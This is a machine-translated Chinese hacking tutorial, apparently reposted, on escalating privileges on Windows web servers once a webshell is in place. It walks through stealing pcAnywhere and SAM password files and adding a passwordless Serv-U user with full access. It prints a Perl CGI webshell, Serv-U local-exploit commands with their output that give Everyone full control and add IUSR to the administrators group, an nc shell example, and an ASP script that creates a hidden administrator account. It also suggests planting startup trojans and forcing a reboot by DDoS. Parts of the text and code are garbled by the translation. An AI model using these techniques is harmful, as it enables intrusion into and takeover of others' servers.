Improve permissions ultimate skills

xiaoxiao2021-03-06  47

Author: WekweN

http://www.wrsky.com

This article combines many masters to improve the skills and some ideas

When we get a WebShell, the next thing to do is to improve the permissions.

Personal summary is as follows:

1: C: / Documents and Settings / All Users / Application Data / Symantec / PCANywhere /

See if you can jump to this directory, if it is the best, directly under its CIF file, get the PCANYWHERE password, log in

PS:

Crack tools are available. Please ask yourself!

2.c: / Winnt / System32 / Config /

Enter here

SAM, crack the user's password

Software for cracking SAM password

LC,

Saminside

3.c: / Documents and Settings / All Users / "Start" menu / program /

Seeing that you can jump here, we can get a lot of useful information from here.

You can see a lot of shortcuts, we generally choose Serv-U, then view attributes locally, know if the path, see if you can jump

After entering, if there is permission to modify servudaemon.ini, add a user, password is empty

[User = wekwen | 1]

PASSWORD =

Homedir = C: /

TIMEOUT = 600

Maintenance = system

Access1 = C: / | rwamelcdp

Access1 = d: / | rwamelcdp

Access1 = f: / | rwamelcdp

SKEYVALUES =

This user has the highest permission, then we can ftp to Quote Site Exec XXX to improve permissions

4.c: / Winnt / System32 / InetSRV / DATA /

It is this directory, which is also ERVERYONE complete control, what we have to do is uploading the tools of the promotion permissions, then execute

5. See if you can jump to the following directory

C: / PHP, use phpspy

C: / prel, sometimes it is not necessarily this directory (you can also know the attributes by downloading the property) WebShell with CGI

#! / usr / bin / perl

BinMode (stdout);

Syswrite (stdout, "content-type: text / html / r / n / r / n", 27);

$ _ = $ Env {query_string};

S /% 20 / / g;

S /% 2FIG;

$ execTHIS = $ _;

Syswrite (stdout, "

 / r / n", 13);

Open (stderr, "> & stdout") || DIE "can't redirect stderr";

System ($ exECTHIS);

Syswrite (stdout, "/ r / n / r / n", 17);

Close (stderr);

Close (stdout);

EXIT;

Save as CGI execution,

If you can't, you can try the PL extension, change the CGI file just now to the PL file, submit

http: //ANYHOST / RMD.PL? DIR

Display "Reject Access", indicating that it can be executed! Submit right now: first upload a Su.exe (SER-U upgrade authority) to the Prel's bin directory

http: //anyhost/ -cmd.pl? c / perl / bin / su.exe returns:

Serv-U> 3.x local exploit by xiaolu

USAGE: Serv-U.exe "Command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

It is now IUSR permissions, submitted:

http: //anyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe C: / E / T / G Everyone: F"

http: //aNyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe D: / E / T / G Everyone: F"

http://enyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe E: / E / T / G Everyone: F"

http://enyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe f: / e / t / g everyone: f"

If the following information is returned, it will be successful.

Serv-U> 3.x local exploit by xiaolu

<220 Serv-U FTP Server V5.2 for Winsock Ready ...

> User Localadministrator

<331 User Name Okay, Need Password.

*********************************************************** ****

> Pass #l@ * * @p

<230 user logged in, proced.

*********************************************************** ****

> Site maintenance

*********************************************************** ****

CREATING New Domain ...

<200-DomainID = 2

<220 Domain Settings Saved

*********************************************************** ****

Domain XL: 2 Created

Creating Evil User

<200-user = XL

200 User Settings Saved

*********************************************************** ****

[ ] Now exploiting ...

> User XL

<331 User Name Okay, Need Password.

*********************************************************** ****

> Pass 111111

<230 user logged in, proced.

*********************************************************** ****

[ ] Now Executing: Cacls.exe C: / E / T / g Everyone: f

<220 Domain Deleted

Such all partitions are completely controlled for EVERYONE

Now we upgrade your users as an administrator:

Http: //anyhost/ -cmd.pl? c / perl / bin / su.exe "Net localgroup administrators IUSR_Anyhost / Add" 6. You can run "CScript C: /ineTPub/adminScripts/adsutil.vbs Get W3SVC / InprocessisapIAPPS" To improve permissions

Use this cscript c: /inetpub/adminscripts/adsutil.vbs Get W3SVC / INPROCESSISAPIAPPS

View DLL file with privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

Add ASP.DLL to the privilege

Asp.dll is placed in c: /winnt/system32/inetsrv/asp.dll (the location of different machine is not necessarily the same)

We now add CScript Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS "C: /Winnt/System32/IDQ.dll" "C: /Winnt/System32/inetsrv/httpext.dll" "C: / Winnt / System32 / InetSrv / httpodbc .dll "c: /winnt/system32/inetsrv/ssinc.dll" "c: /winnt/system32/msw3prt.dll" "c: /winnt/system32/inetsrv/asp.dll"

You can use the cscript adsutil.vbs get / w3svc / inprocessisapiapps to see if it is added.

7. You can also use this code to try to improve, as if the effect is not obvious

<% @ codepage = 936%> <% response.expires = 0

ON Error ResMe next

Session.Timeout = 50

Server.scripttimeout = 3000

Set lp = server.createObject ("wscript.network")

Oz = "Winnt: //" & lp.computername

Set ob = GetObject (oz)

Set oe = getObject (oz & "/ administrators, group")

Set = obs.create ("User", "Wekwen $")

Od.SetPassword "wekwen" <----- password

Od.setInfo

Set of = getObject (Oz & "/ Wekwen $, User")

OE.Add (of.adspath)

Response.write "Wekwen $ Super Account Establishment!"%>

Check if this code is checked

<% @ codepage = 936%>

<% Response.expires = 0

On Error ResMe Next 'Find Administrators Group Accounts

Set tn = server.createObject ("wscript.network")

Set objgroup = getObject ("Winnt: //" & Tn.computername & "/ administrators, group")

For Each Admin In Objgroup.members

Response.write admin.name & "
" Next

IF Err THEN

Response.write "No, WScript.Network"

END IF

%>

8.c: / program files / java web start /

If you can, it is generally small, you can try to use JSP's WebShell, I heard that the permissions are small, I have not met.

9. Finally, if the host setting is very metamorphosis, you can try the C: / Documents and Settings / All Users / "Start" menu / programs / start "to write BAT, VBS and other Trojans.

Wait until the host restarts or you DDOS forced it to restart to achieve the purpose of enhancement.

Summary, find the directory with execution and writing, what catalog, and then upload the improvement tool, finally executed, three words "find" "on" "execution"

The above is my own, everyone has a lot of ways to share

Wekwen

04.12.12

转载请注明原文地址:https://www.9cbs.com/read-80768.html

New Post(0)